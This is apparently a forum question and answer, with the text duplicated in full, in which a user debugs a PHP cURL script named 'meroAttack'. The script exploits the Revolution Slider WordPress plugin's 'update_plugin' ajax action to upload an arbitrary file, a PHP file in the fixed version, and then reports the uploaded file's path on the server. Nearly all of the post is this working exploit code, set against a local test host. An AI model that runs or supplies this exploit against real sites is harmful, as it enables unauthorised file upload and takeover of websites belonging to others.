Curl_init 无效字符串“无法打开文件”“”(长度=21)
Curl_init not working string 'couldn't open file ""' (length=21)
我正在尝试测试我的 wordpress 网站上的一个漏洞并使用 curl 来测试它。
然而,curl 似乎不起作用。
<?php
// $uploaded file
$myf = "test.txt";
function meroAttack($site, $myf) {
$agent = "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)";
$cookie_file_path = "/";
$site = rtrim($site,'/');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $site . "/wp-admin/admin-ajax.php");
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Length: 1024','Expect:'));
curl_setopt($ch, CURLOPT_POSTFIELDS, array("update_file" => "@" . realpath($myf), "action" => "revslider_ajax_action", "client_action" => "update_plugin"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$result = curl_exec($ch);
if($result === FALSE){
var_dump(curl_error($ch));
}
if (eregi('Update in progress', $result)) {
echo $site . "/wp-content/plugins/revslider/temp/update_extract/" . $myf;
} else {
echo $site . " : Not Revslider \n\n";
}
curl_close($ch);
}
meroAttack("http://test.wordpress.devlocal/", $myf);
?>
此外,它在我的页面上显示如下错误:
string 'couldn't open file ""' (length=21)
是不是漏了什么
已更正问题。
问题是实际路径不正确:
$myf = "/wamp/www/laravel/laravel/public/test2.php";
最终代码:
<?php
ini_set('display_errors',1);
ini_set('display_startup_errors',1);
error_reporting(-1);
// $uploaded file
$myf = "/wamp/www/laravel/laravel/public/test2.php";
function meroAttack($site, $myf) {
$agent = "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)";
$cookie_file_path = "/";
$site = rtrim($site,'/');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $site . "/wp-admin/admin-ajax.php");
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Length: 1024','Expect:'));
curl_setopt($ch, CURLOPT_POSTFIELDS, array("update_file" => "@" . realpath($myf), "action" => "revslider_ajax_action", "client_action" => "update_plugin"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$result = curl_exec($ch);
if($result === FALSE){
var_dump(curl_error($ch));
var_dump(curl_errno($ch));
}
if (eregi('Update in progress', $result)) {
echo $site . "/wp-content/plugins/revslider/temp/update_extract/" . $myf;
} else {
echo $site . " : Not Revslider \n\n";
}
curl_close($ch);
}
meroAttack("http://test.wordpress.devlocal/", $myf);
我正在尝试测试我的 wordpress 网站上的一个漏洞并使用 curl 来测试它。
然而,curl 似乎不起作用。
<?php
// $uploaded file
$myf = "test.txt";
function meroAttack($site, $myf) {
$agent = "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)";
$cookie_file_path = "/";
$site = rtrim($site,'/');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $site . "/wp-admin/admin-ajax.php");
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Length: 1024','Expect:'));
curl_setopt($ch, CURLOPT_POSTFIELDS, array("update_file" => "@" . realpath($myf), "action" => "revslider_ajax_action", "client_action" => "update_plugin"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$result = curl_exec($ch);
if($result === FALSE){
var_dump(curl_error($ch));
}
if (eregi('Update in progress', $result)) {
echo $site . "/wp-content/plugins/revslider/temp/update_extract/" . $myf;
} else {
echo $site . " : Not Revslider \n\n";
}
curl_close($ch);
}
meroAttack("http://test.wordpress.devlocal/", $myf);
?>
此外,它在我的页面上显示如下错误:
string 'couldn't open file ""' (length=21)
是不是漏了什么
已更正问题。
问题是实际路径不正确:
$myf = "/wamp/www/laravel/laravel/public/test2.php";
最终代码:
<?php
ini_set('display_errors',1);
ini_set('display_startup_errors',1);
error_reporting(-1);
// $uploaded file
$myf = "/wamp/www/laravel/laravel/public/test2.php";
function meroAttack($site, $myf) {
$agent = "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)";
$cookie_file_path = "/";
$site = rtrim($site,'/');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $site . "/wp-admin/admin-ajax.php");
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Length: 1024','Expect:'));
curl_setopt($ch, CURLOPT_POSTFIELDS, array("update_file" => "@" . realpath($myf), "action" => "revslider_ajax_action", "client_action" => "update_plugin"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$result = curl_exec($ch);
if($result === FALSE){
var_dump(curl_error($ch));
var_dump(curl_errno($ch));
}
if (eregi('Update in progress', $result)) {
echo $site . "/wp-content/plugins/revslider/temp/update_extract/" . $myf;
} else {
echo $site . " : Not Revslider \n\n";
}
curl_close($ch);
}
meroAttack("http://test.wordpress.devlocal/", $myf);